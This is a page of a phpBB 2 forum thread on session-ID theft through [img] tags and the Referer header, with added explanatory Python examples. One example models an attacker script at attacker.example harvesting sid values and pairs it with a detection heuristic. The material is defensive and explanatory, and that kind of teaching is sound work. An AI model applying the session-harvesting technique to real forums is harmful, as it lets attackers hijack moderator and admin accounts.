The Final phpBB 2 Security Vulnerability
Slackervaara (Board Member; joined 01 Jan 2009; 70 posts)
Posted: Tue Aug 10, 2010 1:08 am
Subject: Re: The Final phpBB 2 Security Error

Does the Firefox add-on RefControl offer any protection against this type of hack attempt?
Acaria (Board Member; joined 20 Feb 2009; 238 posts)
Posted: Tue Aug 10, 2010 12:22 pm
Subject: Re: The Final phpBB 2 Security Error

Very possible. I haven't used it but I know it does something with the HTTP referrers, which is exactly what is involved in a CSRF attack.
ABDev (Board Member; joined 01 Jun 2009; 76 posts)
Posted: Tue Aug 10, 2010 12:31 pm
Subject: Re: The Final phpBB 2 Security Error

Acaria wrote:
Let's say you want to hack a board. You write a simple script to take the full URL in the browser of the attacked victim. You put it in the [img][/img] tags, which load the script into the page, allowing it to do its intended effect. To do real damage, you post this in a thread you know will be locked. You know, some kind of random spam. When a Mod (or, if they're lucky, an Admin) locks the thread, he is sent back to the thread displaying his current SID in the URL. This URL is sent to the hacker through his script, so he has the guy's SID.

Ok, I understand now how that exploit works. It's an include-type issue.
I'm going to look if there's not a better solution than the fixes in the SVN.
Thanks :)
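An added example, not code from this thread or from phpBB, modelling the SID-harvesting trick Acaria describes above and the RefControl question a few posts up. A post carries an [img] tag whose URL is an attacker script; the browser of anyone viewing the page fetches it with a Referer header holding the page URL, and when the board has appended the session id to that URL the attacker reads it straight out of the Referer. The hostnames, paths and sid values are constructed, and the board-side scan of [img] URLs is an assumed heuristic, not a phpBB function.

```python
"""
Added example (not code from the thread or from phpBB): how an [img] tag
leaks a URL-carried session id through the Referer header, and a
board-side scan for such [img] URLs. Hostnames, paths and sid values are
constructed for the example; the scan is an assumed heuristic.
"""
import re
from urllib.parse import parse_qs, urlparse


def browser_request_for_img(page_url: str, img_url: str, send_referer: bool = True) -> dict:
    """Headers the viewer's browser sends when it fetches an [img] URL embedded
    in a post while showing page_url. send_referer=False models a referrer-
    blocking add-on such as RefControl."""
    headers = {"Host": urlparse(img_url).netloc}
    if send_referer:
        headers["Referer"] = page_url
    return headers


def harvest_sid(headers: dict):
    """Attacker's script: read sid= out of the Referer query string, if present."""
    ref = headers.get("Referer")
    if not ref:
        return None
    return parse_qs(urlparse(ref).query).get("sid", [None])[0]


IMG_TAG = re.compile(r"\[img\](.+?)\[/img\]", re.IGNORECASE | re.DOTALL)
STATIC_IMAGE_EXT = (".gif", ".jpg", ".jpeg", ".png")


def suspicious_img_urls(post_text: str) -> list:
    """Moderator-side check: [img] URLs that carry a query string or do not end
    in a static image extension. Heuristic only: a script can be served from a
    .png path, so this flags the obvious cases, not all of them."""
    hits = []
    for url in IMG_TAG.findall(post_text):
        url = url.strip()
        parsed = urlparse(url)
        if parsed.query or not parsed.path.lower().endswith(STATIC_IMAGE_EXT):
            hits.append(url)
    return hits


if __name__ == "__main__":
    # Constructed: a moderator viewing a thread with the sid appended to the URL.
    page = "http://forum.example/viewtopic.php?t=42&sid=3f9a1c0e7b2d4a6f8e1c5b7a9d0f2e4c"
    grab = "http://attacker.example/grab.php"
    print("leaked sid:", harvest_sid(browser_request_for_img(page, grab)))
    print("with referrer suppressed:",
          harvest_sid(browser_request_for_img(page, grab, send_referer=False)))
    spam = "[img]http://attacker.example/grab.php[/img] buy now [img]http://cdn.example/logo.png[/img]"
    print("suspicious:", suspicious_img_urls(spam))
```

The second function is the check a moderator would want before locking a spam thread while carrying admin rights: any [img] URL that is not a plain static image file deserves a look. It is only a heuristic, since an attacker can serve a script from a path ending in .png, so the structural defence is to keep the session id out of URLs; the Referer carries the URL but never cookies. Suppressing the Referer client-side, as RefControl does, protects only the users who run it.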
Salvatos (Board Member; joined 19 Feb 2009; 449 posts; Location: Québec)
Posted: Tue Aug 10, 2010 2:12 pm
Subject: Re: The Final phpBB 2 Security Error

Acaria wrote:
*facepalm*

Thank you DogCow. I'll add these changes immediately! :)

Oh my, I dared not point this out earlier because I thought you were saying that the fix in this thread was ineffective :oops: :roll:
Glad to know my board IS safe after all :o
drathbun (Board Member; joined 24 Jul 2008; 729 posts; Location: Texas)
Posted: Tue Aug 10, 2010 8:00 pm
Subject: Re: The Final phpBB 2 Security Error

First of all, I would submit that this is just yet another reason to never log on to your board as Admin unless you need to do actual admin things. Second, even if an admin SID gets stolen, unless that admin has logged in to the admin control panel and re-authenticated, the session is not authorized to do that. The would-be hacker would be forced to re-auth, and if they don't know the admin password, they're locked out of the admin panel. Third, it's a simple matter to put an additional layer of security on the admin panel using .htaccess rules.

None of this addresses moderator exposure, of course. But there are other options either in place or available that can help protect your administrator options.

_________________
phpBBDoctor Blog
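An added model, not phpBB's code, of the point drathbun makes about stolen SIDs and the admin panel. An ordinary login yields a user-level session; the ACP is a second gate that opens only once the password is re-entered for that same session, so a thief holding the sid alone stays at user level. The class, method and field names, and the PBKDF2 password hashing, are assumptions made for the model and do not reproduce phpBB2's own scheme or schema.

```python
"""
Added example (not phpBB's code): a minimal model of a user-level session
versus the admin-panel re-authentication gate. Names, fields and the
password hashing are assumptions for the model, not phpBB2's schema.
"""
import hashlib
import hmac
import secrets

PBKDF2_ROUNDS = 20_000  # assumed; kept low so the demo runs quickly


def _hash_password(password: str, salt: bytes) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)


class Board:
    def __init__(self):
        self.users = {}     # name -> (salt, digest, is_admin)
        self.sessions = {}  # sid -> {"user": name, "admin_level": bool}

    def add_user(self, name: str, password: str, is_admin: bool = False) -> None:
        salt = secrets.token_bytes(16)
        self.users[name] = (salt, _hash_password(password, salt), is_admin)

    def _check_password(self, name: str, password: str) -> bool:
        salt, digest, _ = self.users[name]
        return hmac.compare_digest(_hash_password(password, salt), digest)

    def login(self, name: str, password: str):
        """Board login: returns a fresh sid for a user-level session, or None.
        This sid is what an [img]/Referer trick can steal."""
        if name not in self.users or not self._check_password(name, password):
            return None
        sid = secrets.token_hex(16)
        self.sessions[sid] = {"user": name, "admin_level": False}
        return sid

    def acp_reauth(self, sid: str, password: str) -> bool:
        """'Go to admin panel' prompts for the password again. Only the correct
        password of the session's own user, who must be an admin, marks this
        session as admin-level; a thief with just the sid cannot pass."""
        s = self.sessions.get(sid)
        if s is None:
            return False
        _, _, is_admin = self.users[s["user"]]
        if not is_admin or not self._check_password(s["user"], password):
            return False
        s["admin_level"] = True
        return True

    def view_allowed(self, sid: str) -> bool:
        """Ordinary pages: any live session will do."""
        return sid in self.sessions

    def acp_allowed(self, sid: str) -> bool:
        """Admin pages: the session must have passed acp_reauth."""
        s = self.sessions.get(sid)
        return s is not None and s["admin_level"]


if __name__ == "__main__":
    board = Board()
    board.add_user("admin", "correct horse battery", is_admin=True)
    sid = board.login("admin", "correct horse battery")
    # A sid harvested from a Referer gives the thief user-level access only.
    print("thief can view:", board.view_allowed(sid))                    # True
    print("thief in ACP:", board.acp_allowed(sid))                       # False
    print("thief re-auth guess:", board.acp_reauth(sid, "password1"))    # False
    # The admin re-enters the password: now the same sid opens the ACP,
    # so a sid leaked after this point is fully exposed.
    print("admin re-auth:", board.acp_reauth(sid, "correct horse battery"))  # True
    print("thief in ACP now:", board.acp_allowed(sid))                   # True
```

The last two lines show the other half of drathbun's first point: once the admin has re-authenticated, that same sid opens the ACP, so a session that was upgraded and then leaked is fully exposed, which is why he advises not staying logged in as admin. His third point, an Apache .htaccess with HTTP Basic authentication on the admin/ directory, adds a credential that a stolen board session never carried.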
JLA (Board Member; joined 30 Apr 2009; 451 posts; Location: U.S.A)
Posted: Wed Sep 28, 2011 12:13 am
Subject: Re: The Final phpBB 2 Security Error

Question about the .23 to .24 changes. Are you required to click the admin link twice to gain access, once prior to PW entry and once after?
_________________
http://www.jlaforums.com
Salvatos (Board Member; joined 19 Feb 2009; 449 posts; Location: Québec)
Posted: Wed Sep 28, 2011 10:55 am
Subject: Re: The Final phpBB 2 Security Error

You mean to get to the control panel? You click Go to admin panel, then you "log in", then you're redirected to the ACP.
JLA (Board Member; joined 30 Apr 2009; 451 posts; Location: U.S.A)
Posted: Wed Sep 28, 2011 11:58 am
Subject: Re: The Final phpBB 2 Security Error

Salvatos wrote:
You mean to get to the control panel? You click Go to admin panel, then you "log in", then you're redirected to the ACP.

What I mean is this.

Prior to the .23 to .24 update:

* Admin logs into site via login screen - after login, is redirected to last place or index depending on how/when logged in
* Admin clicks admin link - is redirected to login screen
* Admin logs in again and is redirected to admin panel

After the .23 to .24 update:

* Admin logs into site via login screen - after login, is redirected to last place or index depending on how/when logged in
* Admin clicks admin link - is redirected to login screen
* Admin logs in again and is redirected to index
* Admin clicks admin link and is directed to admin panel

(Notice that after the third step the sid shows, then after the fourth step the PID shows.)

Dog Cow (Board Member; joined 18 Nov 2008; 378 posts)
Posted: Thu Sep 29, 2011 11:21 am
Subject: Re: The Final phpBB 2 Security Error

Yes, this modification changes how the admin panel works. Examine the changes for sessions.php to see how (diff in my first post).
_________________
Moof!
Lincoln's Tomb, Oak Ridge Cemetery, Springfield IL | Mac 512K Blog | Mac GUI
JLA (Board Member; joined 30 Apr 2009; 451 posts; Location: U.S.A)
Posted: Thu Sep 29, 2011 12:39 pm
Subject: Re: The Final phpBB 2 Security Error

Dog Cow wrote:
Yes, this modification changes how the admin panel works. Examine the changes for sessions.php to see how (diff in my first post).

Thanks - just wanted to verify. Appreciate you putting together the change list from the code!

Dog Cow (Board Member; joined 18 Nov 2008; 378 posts)
Posted: Mon Oct 10, 2011 6:24 pm
Subject: Re: The Final phpBB 2 Security Error

JLA wrote:
Thanks - just wanted to verify. Appreciate you putting together the change list from the code!

Thank the appropriate developer from the phpBB team. I just posted the announcement here; I didn't write any of the code or make any of the diffs.

JLA (Board Member; joined 30 Apr 2009; 451 posts; Location: U.S.A)
Posted: Fri Oct 14, 2011 9:09 pm
Subject: Re: The Final phpBB 2 Security Error

Dog Cow wrote:
Thank the appropriate developer from the phpBB team. I just posted the announcement here; I didn't write any of the code or make any of the diffs.

Didn't you put the code change list together?

Dog Cow (Board Member; joined 18 Nov 2008; 378 posts)
Posted: Sat Oct 15, 2011 3:35 pm
Subject: Re: The Final phpBB 2 Security Error

JLA wrote:
Didn't you put the code change list together?

No. I just wrote the first post. The code changes were done automatically by software.

JLA (Board Member; joined 30 Apr 2009; 451 posts; Location: U.S.A)
Posted: Sat Oct 15, 2011 9:31 pm
Subject: Re: The Final phpBB 2 Security Error

Dog Cow wrote:
No. I just wrote the first post. The code changes were done automatically by software.

Oh, ok. Interesting to know. What is the software that generates this? Does it compare two root directories and generate the changes?

Dog Cow (Board Member; joined 18 Nov 2008; 378 posts)
Posted: Sun Oct 16, 2011 3:49 pm
Subject: Re: The Final phpBB 2 Security Error

JLA wrote:
Oh, ok. Interesting to know. What is the software that generates this?

On Unix and Linux systems, it's called diff.
Page 12 of 14 (all times are GMT - 4 hours)